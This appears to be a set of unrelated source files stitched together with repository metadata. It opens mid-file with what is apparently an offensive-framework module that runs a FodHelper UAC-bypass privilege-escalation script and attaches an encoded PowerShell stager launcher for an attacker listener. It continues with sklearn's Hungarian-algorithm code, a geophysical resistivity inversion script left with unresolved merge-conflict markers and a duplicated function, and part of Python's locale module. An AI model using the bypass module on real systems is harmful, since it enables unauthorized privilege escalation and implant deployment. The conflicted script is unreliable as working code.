self.mainMenu = mainMenu for param in params: # parameter format is [Name, Value] option, value = param if option in self.options: self.options[option]['Value'] = value def generate(self, obfuscate=False, obfuscationCommand=""): listenerName = self.options['Listener']['Value'] # staging options userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-FodHelperBypass.ps1" try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode if not self.mainMenu.listeners.is_listener_valid(listenerName): # not a valid listener, return nothing for the script print helpers.color("[!] Invalid listener: " + listenerName) return "" else: # generate the PowerShell one-liner with all of the proper options set launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) encScript = launcher.split(" ")[-1] if launcher == "": print helpers.color("[!] Error in launcher generation.") return "" else: script += "Invoke-FodHelperBypass -Command \"%s\"" % (encScript) return script
bsd-3-clause
marcsans/cnn-physics-perception
phy/lib/python2.7/site-packages/sklearn/utils/linear_assignment_.py
67
9524
""" Solve the unique lowest-cost assignment problem using the Hungarian algorithm (also known as Munkres algorithm). """ # Based on original code by Brain Clapper, adapted to NumPy by Gael Varoquaux. # Heavily refactored by Lars Buitinck. # # TODO: a version of this algorithm has been incorporated in SciPy; use that # when SciPy 0.17 is released. # Copyright (c) 2008 Brian M. Clapper <bmc@clapper.org>, Gael Varoquaux # Author: Brian M. Clapper, Gael Varoquaux # LICENSE: BSD import numpy as np from .fixes import astype def linear_assignment(X): """Solve the linear assignment problem using the Hungarian algorithm. The problem is also known as maximum weight matching in bipartite graphs. The method is also known as the Munkres or Kuhn-Munkres algorithm. Parameters ---------- X : array The cost matrix of the bipartite graph Returns ------- indices : array, The pairs of (row, col) indices in the original array giving the original ordering. References ---------- 1. http://www.public.iastate.edu/~ddoty/HungarianAlgorithm.html 2. Harold W. Kuhn. The Hungarian Method for the assignment problem. *Naval Research Logistics Quarterly*, 2:83-97, 1955. 3. Harold W. Kuhn. Variants of the Hungarian method for assignment problems. *Naval Research Logistics Quarterly*, 3: 253-258, 1956. 4. Munkres, J. Algorithms for the Assignment and Transportation Problems. *Journal of the Society of Industrial and Applied Mathematics*, 5(1):32-38, March, 1957. 5. https://en.wikipedia.org/wiki/Hungarian_algorithm """ indices = _hungarian(X).tolist() indices.sort() # Re-force dtype to ints in case of empty list indices = np.array(indices, dtype=int) # Make sure the array is 2D with 2 columns. # This is needed when dealing with an empty list indices.shape = (-1, 2) return indices class _HungarianState(object): """State of one execution of the Hungarian algorithm. Parameters ---------- cost_matrix : 2D matrix The cost matrix. Does not have to be square. 
""" def __init__(self, cost_matrix): cost_matrix = np.atleast_2d(cost_matrix) # If there are more rows (n) than columns (m), then the algorithm # will not be able to work correctly. Therefore, we # transpose the cost function when needed. Just have to # remember to swap the result columns back later. transposed = (cost_matrix.shape[1] < cost_matrix.shape[0]) if transposed: self.C = (cost_matrix.T).copy() else: self.C = cost_matrix.copy() self.transposed = transposed # At this point, m >= n. n, m = self.C.shape self.row_uncovered = np.ones(n, dtype=np.bool) self.col_uncovered = np.ones(m, dtype=np.bool) self.Z0_r = 0 self.Z0_c = 0 self.path = np.zeros((n + m, 2), dtype=int) self.marked = np.zeros((n, m), dtype=int) def _find_prime_in_row(self, row): """ Find the first prime element in the specified row. Returns the column index, or -1 if no starred element was found. """ col = np.argmax(self.marked[row] == 2) if self.marked[row, col] != 2: col = -1 return col def _clear_covers(self): """Clear all covered matrix cells""" self.row_uncovered[:] = True self.col_uncovered[:] = True def _hungarian(cost_matrix): """The Hungarian algorithm. Calculate the Munkres solution to the classical assignment problem and return the indices for the lowest-cost pairings. Parameters ---------- cost_matrix : 2D matrix The cost matrix. Does not have to be square. Returns ------- indices : 2D array of indices The pairs of (row, col) indices in the original array giving the original ordering. """ state = _HungarianState(cost_matrix) # No need to bother with assignments if one of the dimensions # of the cost matrix is zero-length. step = None if 0 in cost_matrix.shape else _step1 while step is not None: step = step(state) # Look for the starred columns results = np.array(np.where(state.marked == 1)).T # We need to swap the columns because we originally # did a transpose on the input cost matrix. 
if state.transposed: results = results[:, ::-1] return results # Individual steps of the algorithm follow, as a state machine: they return # the next step to be taken (function to be called), if any. def _step1(state): """Steps 1 and 2 in the Wikipedia page.""" # Step1: For each row of the matrix, find the smallest element and # subtract it from every element in its row. state.C -= state.C.min(axis=1)[:, np.newaxis] # Step2: Find a zero (Z) in the resulting matrix. If there is no # starred zero in its row or column, star Z. Repeat for each element # in the matrix. for i, j in zip(*np.where(state.C == 0)): if state.col_uncovered[j] and state.row_uncovered[i]: state.marked[i, j] = 1 state.col_uncovered[j] = False state.row_uncovered[i] = False state._clear_covers() return _step3 def _step3(state): """ Cover each column containing a starred zero. If n columns are covered, the starred zeros describe a complete set of unique assignments. In this case, Go to DONE, otherwise, Go to Step 4. """ marked = (state.marked == 1) state.col_uncovered[np.any(marked, axis=0)] = False if marked.sum() < state.C.shape[0]: return _step4 def _step4(state): """ Find a noncovered zero and prime it. If there is no starred zero in the row containing this primed zero, Go to Step 5. Otherwise, cover this row and uncover the column containing the starred zero. Continue in this manner until there are no uncovered zeros left. Save the smallest uncovered value and Go to Step 6. 
""" # We convert to int as numpy operations are faster on int C = (state.C == 0).astype(np.int) covered_C = C * state.row_uncovered[:, np.newaxis] covered_C *= astype(state.col_uncovered, dtype=np.int, copy=False) n = state.C.shape[0] m = state.C.shape[1] while True: # Find an uncovered zero row, col = np.unravel_index(np.argmax(covered_C), (n, m)) if covered_C[row, col] == 0: return _step6 else: state.marked[row, col] = 2 # Find the first starred element in the row star_col = np.argmax(state.marked[row] == 1) if not state.marked[row, star_col] == 1: # Could not find one state.Z0_r = row state.Z0_c = col return _step5 else: col = star_col state.row_uncovered[row] = False state.col_uncovered[col] = True covered_C[:, col] = C[:, col] * ( astype(state.row_uncovered, dtype=np.int, copy=False)) covered_C[row] = 0 def _step5(state): """ Construct a series of alternating primed and starred zeros as follows. Let Z0 represent the uncovered primed zero found in Step 4. Let Z1 denote the starred zero in the column of Z0 (if any). Let Z2 denote the primed zero in the row of Z1 (there will always be one). Continue until the series terminates at a primed zero that has no starred zero in its column. Unstar each starred zero of the series, star each primed zero of the series, erase all primes and uncover every line in the matrix. Return to Step 3 """ count = 0 path = state.path path[count, 0] = state.Z0_r path[count, 1] = state.Z0_c while True: # Find the first starred element in the col defined by # the path. 
row = np.argmax(state.marked[:, path[count, 1]] == 1) if not state.marked[row, path[count, 1]] == 1: # Could not find one break else: count += 1 path[count, 0] = row path[count, 1] = path[count - 1, 1] # Find the first prime element in the row defined by the # first path step col = np.argmax(state.marked[path[count, 0]] == 2) if state.marked[row, col] != 2: col = -1 count += 1 path[count, 0] = path[count - 1, 0] path[count, 1] = col # Convert paths for i in range(count + 1): if state.marked[path[i, 0], path[i, 1]] == 1: state.marked[path[i, 0], path[i, 1]] = 0 else: state.marked[path[i, 0], path[i, 1]] = 1 state._clear_covers() # Erase all prime markings state.marked[state.marked == 2] = 0 return _step3 def _step6(state): """ Add the value found in Step 4 to every element of each covered row, and subtract it from every element of each uncovered column. Return to Step 4 without altering any stars, primes, or covered lines. """ # the smallest uncovered value in the matrix if np.any(state.row_uncovered) and np.any(state.col_uncovered): minval = np.min(state.C[state.row_uncovered], axis=0) minval = np.min(minval[state.col_uncovered]) state.C[np.logical_not(state.row_uncovered)] += minval state.C[:, state.col_uncovered] -= minval return _step4
mit
vitale232/ves
ves/VESinverse_vectorized.py
1
12839
# -*- coding: utf-8 -*- """ Created on Thu Jan 28 16:32:48 2016 @author: jclark this code uses the Ghosh method to determine the apparent resistivities for a layered earth model. Either schlumberger or Wenner configurations can be used """ import numpy as np import random import matplotlib matplotlib.use('Qt5Agg') import matplotlib.pyplot as plt plt.style.use('bmh') import sys # Schlumberger filter fltr1 = [0., .00046256, -.0010907, .0017122, -.0020687, .0043048, -.0021236, .015995, .017065, .098105, .21918, .64722, 1.1415, .47819, -3.515, 2.7743, -1.201, .4544, -.19427, .097364, -.054099, .031729, -.019109, .011656, -.0071544, .0044042, -.002715, .0016749, -.0010335, .00040124] #Wenner Filter fltr2 = [0., .000238935, .00011557, .00017034, .00024935, .00036665, .00053753, .0007896, .0011584, .0017008, .0024959, .003664, .0053773, .007893, .011583, .016998, .024934, .036558, .053507, .078121, .11319, .16192, .22363, .28821, .30276, .15523, -.32026, -.53557, .51787, -.196, .054394, -.015747, .0053941, -.0021446, .000665125] print(len(fltr1)) print(len(fltr2)) #I know there must be a better method to assign lists. And probably numpy #arrays would be best. But my Python wasn't up to it. If the last letter #is an 'l' that means it is a log10 of the value # 65 is completely arbitrary p = [0] * 20 # earth layer parameters? r = [0] * 65 # apparent resistivty? rl = [0] * 65 # np.log(r) ? t = [0] * 50 # b = [0] * 65 # asav = [0] * 65 # voltage spacing in meters? asavl = [0] * 65 # np.log(asav) adatl = [0] * 65 # interpolated voltage spacing ( np.log(10) / 6 )? rdatl = [0] * 65 # np.log() # adat = [0] * 65 # voltage spacing input # rdat = [0] * 65 # apparent res input pkeep = [0] * 65 # earth parameters after applying equations? rkeep = [0] * 65 # r after applying equations? rkeepl = [0] * 65 # np.log()! 
pltanswer = [0] * 65 pltanswerl = [0] * 65 pltanswerkeep = [0] * 65 pltanswerkeepl = [0] * 65 rl = [0] * 65 small = [0] * 65 xlarge = [0] * 65 x=[0] * 100 y = [0] * 100 y2 = [0] * 100 u = [0] * 5000 new_x = [0] * 1000 new_y = [0] * 1000 ndat = 13 #hard coded data input - spacing and apparent resistivities measured #in teh field adat = [0., 0.55, 0.95, 1.5, 2.5, 3., 4.5, 5.5, 9., 12., 20., 30., 70.] rdat = [0., 125., 110., 95., 40., 24., 15., 10.5, 8., 6., 6.5, 11., 25.] one30 = 1.e30 # What's the purpose of this and should it be user input? rms = one30 # Just a starting value for rmserror? errmin = 1.e10 # Should this be user input? # INPUT array_spacing = 'wenner' # 1 is for shchlumberger and 2 is for Wenner nLayers = 3 #number of layers n = 2 * nLayers - 1 # What does n represent? number of parameters spac = 0.2 # smallest electrode spacing - should this come from the input file? m = 20 # number of points where resistivity is calculated spac = np.log(spac) delx = np.log(10.0) / 6. # I take it this is the sample interval on the log scale? # this is where the range in parameters should be input from a GUI # I'm hard coding this in for now #enter thickenss range for each layer and then resistivity range. #for 3 layers small[1] and small[2] are low end of thickness range # small[3], small[4] and small[5] are the low end of resistivities # I think I have it coded up that these are getting grabbed from the rectangles currently. # Is that the best way to go? small[1] = 1. small[2] = 10. small[3] = 20. small[4] = 2. small[5] = 500. xlarge[1] = 5 xlarge[2] = 75. xlarge[3] = 200. xlarge[4] = 100 xlarge[5] = 3000. iter_ = 10000 #number of iterations for the Monte Carlo guesses. to be input on GUI # Is 10000 the most reasonable default, or should I play with it? 
def readData(adat, rdat, ndat, return_indexed=False): #normally this is where the data would be read from the csv file # but now I'm just hard coding it in as global lists for i in range(1, ndat): adatl[i] = np.log10(adat[i]) rdatl[i] = np.log10(rdat[i]) if return_indexed: return adatl[:ndat], rdatl[:ndat] else: return adatl, rdatl <<<<<<< HEAD ======= def error(): # simple rms error calc sumerror = 0. #pltanswer = [0]*64 spline(m, one30, one30, asavl, rl, y2) # So this calculates the predicted fit? # and essentially operates on the list in place? for i in range(1, ndat): # So you always skip the value 0? due to -inf returns? ans = splint(m, adatl[i], asavl, rl, y2) # Then this calulates error? sumerror = sumerror + (rdatl[i] - ans) * (rdatl[i] - ans) #print(i,sum1,rdat[i],rdatl[i],ans) pltanswerl[i] = ans pltanswer[i] = np.power(10, ans) rms = np.sqrt(sumerror / (ndat - 1)) # check the spline routine # for i in range(1,m+1,1): # anstest = splint(m, asavl[i],asavl,rl,y2) # print( asavl[i], rl[i], anstest) #print(' rms = ', rms) # if you erally want to get a good idea of all perdictions from Montecarlo # perform the following plot (caution - change iter to a smaller number) #plt.loglog(adat[1:ndat],pltanswer[1:ndat]) return rms >>>>>>> 60497dd... ?s def transf(y, i): # these lines apparently find the computer precision ep ep = 1.0 ep = ep / 2.0 fctr = ep + 1. while fctr > 1.: ep = ep / 2.0 fctr = ep + 1. u = 1. / np.exp(y) # y = spac - 19. * delx - 0.13069 t[1] = p[n] for j in range(2, nLayers + 1, 1): pwr = -2. * u * p[nLayers + 1 - j] if pwr < np.log(2. * ep): pwr = np.log(2. * ep) a = np.exp(pwr) b = (1. - a) / (1. + a) rs = p[n + 1 - j] tpr = b * rs t[j] = (tpr + t[j - 1]) / (1. + tpr * t[j - 1] / (rs * rs)) r[i] = t[nLayers] return def filters(b, k): for i in range(1, m + 1): re = 0. for j in range(1, k + 1): re = re + b[j] * r[i + k - j] # include ranges of thickness, res . 
push button for rmse error, observed data # surf thicknes .2 - 100 # res 2-3000 # could use huge ranges at cost of time r[i] = re return def rmsfit(): if array_spacing.lower() == 'wenner': y = spac - 19. * delx - 0.13069 mum1 = m + 28 for i in range(1, mum1 + 1): transf(y, i) y = y + delx filters(fltr1, 29) elif array_spacing.lower() == 'schlumberger': s = np.log(2.) y = spac - 10.8792495 * delx mum2 = m + 33 for i in range(1, mum2 + 1): transf(y, i) a = r[i] y1 = y + s transf(y1, i) r[i] = 2. * a - r[i] y = y + delx filters(fltr2, 34) else: print("\nType of survey not indicated.") raise SystemExit('Exiting.\n\n Take better care next time.') x = spac #print("A-Spacing App. Resistivity") for i in range(1, m + 1): a = np.exp(x) asav[i] = a asavl[i] = np.log10(a) rl[i] = np.log10(r[i]) x = x + delx #print("%7.2f %9.3f " % ( asav[i], r[i])) rms = error() return rms def error(): # simple rms error calc sumerror = 0. #pltanswer = [0]*64 spline(m, one30, one30, asavl, rl, y2) # So this calculates the predicted fit? # and essentially operates on the list in place? for i in range(1, ndat): # So you always skip the value 0? due to -inf returns? ans = splint(m, adatl[i], asavl, rl, y2) # Then this calulates error? 
sumerror = sumerror + (rdatl[i] - ans) * (rdatl[i] - ans) #print(i,sum1,rdat[i],rdatl[i],ans) pltanswerl[i] = ans pltanswer[i] = np.power(10, ans) rms = np.sqrt(sumerror / (ndat - 1)) # check the spline routine # for i in range(1,m+1,1): # anstest = splint(m, asavl[i],asavl,rl,y2) # print( asavl[i], rl[i], anstest) #print(' rms = ', rms) # if you erally want to get a good idea of all perdictions from Montecarlo # perform the following plot (caution - change iter to a smaller number) #plt.loglog(adat[1:ndat],pltanswer[1:ndat]) return rms # my code to do a spline fit to predicted data at the nice spacing of Ghosh # use splint to determine the spline interpolated prediction at the # spacing where the measured resistivity was taken - to compare observation # to prediction def spline(n, yp1, ypn, x=[] ,y=[] ,y2=[]): """Still struggling to understand the general operation of this function.""" u = [0] * 1000 one29 = 0.99e30 #print(x,y) if yp1 > one29: y2[0] = 0. u[0] = 0. else: y2[0] = -0.5 u[0] = (3. / (x[1] - x[0])) * ((y[1] - y[0]) / (x[1] - x[0]) - yp1) for i in range(1, n): #print(i,x[i]) sig = (x[i] - x[i-1]) / (x[i+1] - x[i-1]) p=sig * y2[i - 1] + 2. y2[i] = (sig-1.) / p u[i] = (((6. * ((y[i+1] - y[i]) / (x[i+1] - x[i]) - (y[i] - y[i-1]) / x[i] - x[i-1])) / (x[i + 1] - x[i - 1]) - sig * u[i - 1]) / p) if ypn > one29: qn = 0. un = 0. else: qn = 0.5 un = (3. / (x[n] - x[n - 1])) * (ypn - (y[n] - y[n - 1]) / (x[n] - x[n - 1])) y2[n] = (un - qn * u[n - 1]) / (qn * y2[n - 1] + 1.) for k in range(n-1, -1, -1): y2[k] = y2[k] * y2[k + 1] + u[k] return def splint(n, x ,xa=[], ya=[], y2a=[]): # Is this function the T function? 
"""Still struggling to understand the general operation of this function.""" klo = 0 khi = n while khi - klo > 1: k = int((khi + klo) // 2) if xa[k] > x: khi = k else: klo = k h = xa[khi] - xa[klo] if abs(h) < 1e-20: print(" bad xa input") #print(x,xa[khi],xa[klo]) a = (xa[khi] - x) / h b = (x - xa[klo]) / h y = (a * ya[klo] + b * ya[khi] + ((a * a * a - a) * y2a[klo] + (b * b * b - b) * y2a[khi]) * (h * h) /6.) #print("x= ", x,"y= ", y, " ya= ", ya[khi]," y2a= ", y2a[khi], " h= ",h) return y #main here if __name__ == '__main__': adatl, rdatl = readData(adat, rdat, ndat, return_indexed=False) print(adat[1:ndat],rdat[1:ndat]) print('log stufffff') print(adatl[1:ndat], rdatl[1:ndat]) # is this to skip 0? #enter thickenss range for each layer and then resistivity range. #for 3 layers small[1] and small[2] are low end of thickness range # small[3], small[4] and small[5] are the low end of resistivities for iloop in range(1, int(iter_/2) + 1): #print( ' iloop is ', iloop) for i in range(1, n + 1): # number of parameters + 1 randNumber = random.random() # IS this just to add noise to the model? 
# #print(randNumber, ' random') # print(xlarge) # print(small) # s = input('') # print('xlarge[i]: {}, small[i]: {}'.format(xlarge[i], small[i])) p[i] = (xlarge[i] - small[i]) * randNumber + small[i] # print(p) print('\n') print(p) # s = input('') rms = rmsfit() if rms < errmin: print('rms ', rms, ' errmin ', errmin) for i in range(1, n + 1): pkeep[i] = p[i] for i in range(1, m + 1): rkeep[i] = r[i] rkeepl[i] = rl[i] for i in range(1, ndat + 1): pltanswerkeepl[i] = pltanswerl[i] pltanswerkeep[i] = pltanswer[i] errmin = rms #output the best fitting earth model print(' Layer ', ' Thickness ', ' Res_ohm-m ') for i in range(1,nLayers,1): print(i, pkeep[i], pkeep[nLayers+i-1]) print( nLayers, ' Infinite ', pkeep[n]) for i in range(1,m+1, 1): asavl[i] = np.log10(asav[i]) #output the error of fit print( ' RMS error ', errmin) print( ' Spacing', ' Res_pred ', ' Log10_spacing ', ' Log10_Res_pred ') for i in range(1,m+1,1): #print(asav[i], rkeep[i], asavl[i], rkeepl[i]) print("%7.2f %9.3f %9.3f %9.3f" % ( asav[i], rkeep[i], asavl[i], rkeepl[i])) print('plot a lot') plt.loglog(asav[1:m],rkeep[1:m],'-') # resistivity prediction curve plt.loglog(adat[1:ndat],pltanswerkeep[1:ndat], 'ro') # predicted data red dots s=7 plt.loglog(adat[1:ndat],rdat[1:ndat],'bo',markersize=s) #original data blue dots plt.show() plt.grid(True) sys.exit(0)
lgpl-3.0
cluckmaster/MissionPlanner
Lib/locale.py
50
90840
""" Locale support. The module provides low-level access to the C lib's locale APIs and adds high level number formatting APIs as well as a locale aliasing engine to complement these. The aliasing engine includes support for many commonly used locale names and maps them to values suitable for passing to the C lib's setlocale() function. It also includes default encodings for all supported locale names. """ import sys import encodings import encodings.aliases import re import operator import functools # Try importing the _locale module. # # If this fails, fall back on a basic 'C' locale emulation. # Yuck: LC_MESSAGES is non-standard: can't tell whether it exists before # trying the import. So __all__ is also fiddled at the end of the file. __all__ = ["getlocale", "getdefaultlocale", "getpreferredencoding", "Error", "setlocale", "resetlocale", "localeconv", "strcoll", "strxfrm", "str", "atof", "atoi", "format", "format_string", "currency", "normalize", "LC_CTYPE", "LC_COLLATE", "LC_TIME", "LC_MONETARY", "LC_NUMERIC", "LC_ALL", "CHAR_MAX"] try: from _locale import * except ImportError: # Locale emulation CHAR_MAX = 127 LC_ALL = 6 LC_COLLATE = 3 LC_CTYPE = 0 LC_MESSAGES = 5 LC_MONETARY = 4 LC_NUMERIC = 1 LC_TIME = 2 Error = ValueError def localeconv(): """ localeconv() -> dict. Returns numeric and monetary locale-specific parameters. """ # 'C' locale default values return {'grouping': [127], 'currency_symbol': '', 'n_sign_posn': 127, 'p_cs_precedes': 127, 'n_cs_precedes': 127, 'mon_grouping': [], 'n_sep_by_space': 127, 'decimal_point': '.', 'negative_sign': '', 'positive_sign': '', 'p_sep_by_space': 127, 'int_curr_symbol': '', 'p_sign_posn': 127, 'thousands_sep': '', 'mon_thousands_sep': '', 'frac_digits': 127, 'mon_decimal_point': '', 'int_frac_digits': 127} def setlocale(category, value=None): """ setlocale(integer,string=None) -> string. Activates/queries locale processing. 
""" if value not in (None, '', 'C'): raise Error, '_locale emulation only supports "C" locale' return 'C' def strcoll(a,b): """ strcoll(string,string) -> int. Compares two strings according to the locale. """ return cmp(a,b) def strxfrm(s): """ strxfrm(string) -> string. Returns a string that behaves for cmp locale-aware. """ return s _localeconv = localeconv # With this dict, you can override some items of localeconv's return value. # This is useful for testing purposes. _override_localeconv = {} @functools.wraps(_localeconv) def localeconv(): d = _localeconv() if _override_localeconv: d.update(_override_localeconv) return d ### Number formatting APIs # Author: Martin von Loewis # improved by Georg Brandl # Iterate over grouping intervals def _grouping_intervals(grouping): last_interval = None for interval in grouping: # if grouping is -1, we are done if interval == CHAR_MAX: return # 0: re-use last group ad infinitum if interval == 0: if last_interval is None: raise ValueError("invalid grouping") while True: yield last_interval yield interval last_interval = interval #perform the grouping from right to left def _group(s, monetary=False): conv = localeconv() thousands_sep = conv[monetary and 'mon_thousands_sep' or 'thousands_sep'] grouping = conv[monetary and 'mon_grouping' or 'grouping'] if not grouping: return (s, 0) result = "" seps = 0 if s[-1] == ' ': stripped = s.rstrip() right_spaces = s[len(stripped):] s = stripped else: right_spaces = '' left_spaces = '' groups = [] for interval in _grouping_intervals(grouping): if not s or s[-1] not in "0123456789": # only non-digit characters remain (sign, spaces) left_spaces = s s = '' break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse() return ( left_spaces + thousands_sep.join(groups) + right_spaces, len(thousands_sep) * (len(groups) - 1) ) # Strip a given amount of excess padding from the given string def _strip_padding(s, amount): lpos = 0 while amount and s[lpos] == ' ': 
lpos += 1 amount -= 1 rpos = len(s) - 1 while amount and s[rpos] == ' ': rpos -= 1 amount -= 1 return s[lpos:rpos+1] _percent_re = re.compile(r'%(?:\((?P<key>.*?)\))?' r'(?P<modifiers>[-#0-9 +*.hlL]*?)[eEfFgGdiouxXcrs%]') def format(percent, value, grouping=False, monetary=False, *additional): """Returns the locale-aware substitution of a %? specifier (percent). additional is for format strings which contain one or more '*' modifiers.""" # this is only for one-percent-specifier strings and this should be checked match = _percent_re.match(percent) if not match or len(match.group())!= len(percent): raise ValueError(("format() must be given exactly one %%char " "format specifier, %s not valid") % repr(percent)) return _format(percent, value, grouping, monetary, *additional) def _format(percent, value, grouping=False, monetary=False, *additional): if additional: formatted = percent % ((value,) + additional) else: formatted = percent % value # floats and decimal ints need special action! if percent[-1] in 'eEfFgG': seps = 0 parts = formatted.split('.') if grouping: parts[0], seps = _group(parts[0], monetary=monetary) decimal_point = localeconv()[monetary and 'mon_decimal_point' or 'decimal_point'] formatted = decimal_point.join(parts) if seps: formatted = _strip_padding(formatted, seps) elif percent[-1] in 'diu': seps = 0 if grouping: formatted, seps = _group(formatted, monetary=monetary) if seps: formatted = _strip_padding(formatted, seps) return formatted def format_string(f, val, grouping=False): """Formats a string in the same way that the % formatting would use, but takes the current locale into account. 
Grouping is applied if the third parameter is true.""" percents = list(_percent_re.finditer(f)) new_f = _percent_re.sub('%s', f) if operator.isMappingType(val): new_val = [] for perc in percents: if perc.group()[-1]=='%': new_val.append('%') else: new_val.append(format(perc.group(), val, grouping)) else: if not isinstance(val, tuple): val = (val,) new_val = [] i = 0 for perc in percents: if perc.group()[-1]=='%': new_val.append('%') else: starcount = perc.group('modifiers').count('*') new_val.append(_format(perc.group(), val[i], grouping, False, *val[i+1:i+1+starcount])) i += (1 + starcount) val = tuple(new_val) return new_f % val def currency(val, symbol=True, grouping=False, international=False): """Formats val according to the currency settings in the current locale.""" conv = localeconv() # check for illegal values digits = conv[international and 'int_frac_digits' or 'frac_digits'] if digits == 127: raise ValueError("Currency formatting is not possible using " "the 'C' locale.") s = format('%%.%if' % digits, abs(val), grouping, monetary=True) # '<' and '>' are markers if the sign must be inserted between symbol and value s = '<' + s + '>' if symbol: smb = conv[international and 'int_curr_symbol' or 'currency_symbol'] precedes = conv[val<0 and 'n_cs_precedes' or 'p_cs_precedes'] separated = conv[val<0 and 'n_sep_by_space' or 'p_sep_by_space'] if precedes: s = smb + (separated and ' ' or '') + s else: s = s + (separated and ' ' or '') + smb sign_pos = conv[val<0 and 'n_sign_posn' or 'p_sign_posn'] sign = conv[val<0 and 'negative_sign' or 'positive_sign'] if sign_pos == 0: s = '(' + s + ')' elif sign_pos == 1: s = sign + s elif sign_pos == 2: s = s + sign elif sign_pos == 3: s = s.replace('<', sign) elif sign_pos == 4: s = s.replace('>', sign) else: # the default if nothing specified; # this should be the most fitting sign position s = sign + s return s.replace('<', '').replace('>', '') def str(val): """Convert float to integer, taking the locale into account.""" 
# NOTE(review): this chunk opens mid-function -- the next line is the tail of
# the float-to-string helper defined above this view; kept verbatim.
    return format("%.12g", val)

def atof(string, func=float):
    "Parses a string as a float according to the locale settings."
    #First, get rid of the grouping
    ts = localeconv()['thousands_sep']
    if ts:
        string = string.replace(ts, '')
    #next, replace the decimal point with a dot
    dd = localeconv()['decimal_point']
    if dd:
        string = string.replace(dd, '.')
    #finally, parse the string
    return func(string)

def atoi(str):
    "Converts a string to an integer according to the locale settings."
    # Reuse atof() for the grouping/decimal-point cleanup, then parse as int.
    return atof(str, int)

def _test():
    # Manual smoke test: round-trip locale-aware formatting and parsing.
    setlocale(LC_ALL, "")
    #do grouping
    s1 = format("%d", 123456789,1)
    print s1, "is", atoi(s1)
    #standard formatting
    s1 = str(3.14)
    print s1, "is", atof(s1)

### Locale name aliasing engine

# Author: Marc-Andre Lemburg, mal@lemburg.com
# Various tweaks by Fredrik Lundh <fredrik@pythonware.com>

# store away the low-level version of setlocale (it's
# overridden below)
_setlocale = setlocale

def normalize(localename):

    """ Returns a normalized locale code for the given locale
        name.

        The returned locale code is formatted for use with
        setlocale().

        If normalization fails, the original name is returned
        unchanged.

        If the given encoding is not known, the function defaults to
        the default encoding for the locale code just like setlocale()
        does.

    """
    # Normalize the locale name and extract the encoding
    fullname = localename.lower()
    if ':' in fullname:
        # ':' is sometimes used as encoding delimiter.
        fullname = fullname.replace(':', '.')
    if '.' in fullname:
        langname, encoding = fullname.split('.')[:2]
        fullname = langname + '.' + encoding
    else:
        langname = fullname
        encoding = ''

    # First lookup: fullname (possibly with encoding)
    # NOTE(review): norm_encoding is computed here but the first lookup below
    # uses the raw encoding; norm_encoding is only recomputed and used in the
    # second-try branch. Looks deliberate in this version, but worth
    # confirming against upstream locale.py.
    norm_encoding = encoding.replace('-', '')
    norm_encoding = norm_encoding.replace('_', '')
    lookup_name = langname + '.' + encoding
    code = locale_alias.get(lookup_name, None)
    if code is not None:
        return code
    #print 'first lookup failed'

    # Second try: langname (without encoding)
    code = locale_alias.get(langname, None)
    if code is not None:
        #print 'langname lookup succeeded'
        if '.' in code:
            langname, defenc = code.split('.')
        else:
            langname = code
            defenc = ''
        if encoding:
            # Convert the encoding to a C lib compatible encoding string
            norm_encoding = encodings.normalize_encoding(encoding)
            #print 'norm encoding: %r' % norm_encoding
            norm_encoding = encodings.aliases.aliases.get(norm_encoding,
                                                          norm_encoding)
            #print 'aliased encoding: %r' % norm_encoding
            encoding = locale_encoding_alias.get(norm_encoding,
                                                 norm_encoding)
        else:
            encoding = defenc
        #print 'found encoding %r' % encoding
        if encoding:
            return langname + '.' + encoding
        else:
            return langname

    else:
        return localename

def _parse_localename(localename):

    """ Parses the locale code for localename and returns the
        result as tuple (language code, encoding).

        The localename is normalized and passed through the locale
        alias engine. A ValueError is raised in case the locale name
        cannot be parsed.

        The language code corresponds to RFC 1766.  code and encoding
        can be None in case the values cannot be determined or are
        unknown to this implementation.

    """
    code = normalize(localename)
    if '@' in code:
        # Deal with locale modifiers
        code, modifier = code.split('@')
        if modifier == 'euro' and '.' not in code:
            # Assume Latin-9 for @euro locales. This is bogus,
            # since some systems may use other encodings for these
            # locales. Also, we ignore other modifiers.
            return code, 'iso-8859-15'

    if '.' in code:
        return tuple(code.split('.')[:2])
    elif code == 'C':
        return None, None
    raise ValueError, 'unknown locale: %s' % localename

def _build_localename(localetuple):

    """ Builds a locale code from the given tuple (language code,
        encoding).

        No aliasing or normalizing takes place.

    """
    language, encoding = localetuple
    if language is None:
        language = 'C'
    if encoding is None:
        return language
    else:
        return language + '.' + encoding

def getdefaultlocale(envvars=('LC_ALL', 'LC_CTYPE', 'LANG', 'LANGUAGE')):

    """ Tries to determine the default locale settings and returns
        them as tuple (language code, encoding).

        According to POSIX, a program which has not called
        setlocale(LC_ALL, "") runs using the portable 'C' locale.
        Calling setlocale(LC_ALL, "") lets it use the default locale as
        defined by the LANG variable. Since we don't want to interfere
        with the current locale setting we thus emulate the behavior
        in the way described above.

        To maintain compatibility with other platforms, not only the
        LANG variable is tested, but a list of variables given as
        envvars parameter. The first found to be defined will be
        used. envvars defaults to the search path used in GNU gettext;
        it must always contain the variable name 'LANG'.

        Except for the code 'C', the language code corresponds to RFC
        1766.  code and encoding can be None in case the values cannot
        be determined.

    """

    try:
        # check if it's supported by the _locale module
        import _locale
        code, encoding = _locale._getdefaultlocale()
    except (ImportError, AttributeError):
        pass
    else:
        # make sure the code/encoding values are valid
        if sys.platform == "win32" and code and code[:2] == "0x":
            # map windows language identifier to language name
            code = windows_locale.get(int(code, 0))
        # ...add other platform-specific processing here, if
        # necessary...
        return code, encoding

    # fall back on POSIX behaviour
    import os
    lookup = os.environ.get
    for variable in envvars:
        localename = lookup(variable,None)
        if localename:
            if variable == 'LANGUAGE':
                # LANGUAGE may hold a colon-separated priority list;
                # only the first entry is used here.
                localename = localename.split(':')[0]
            break
    else:
        localename = 'C'
    return _parse_localename(localename)


def getlocale(category=LC_CTYPE):

    """ Returns the current setting for the given locale category as
        tuple (language code, encoding).

        category may be one of the LC_* value except LC_ALL. It
        defaults to LC_CTYPE.

        Except for the code 'C', the language code corresponds to RFC
        1766.  code and encoding can be None in case the values cannot
        be determined.

    """
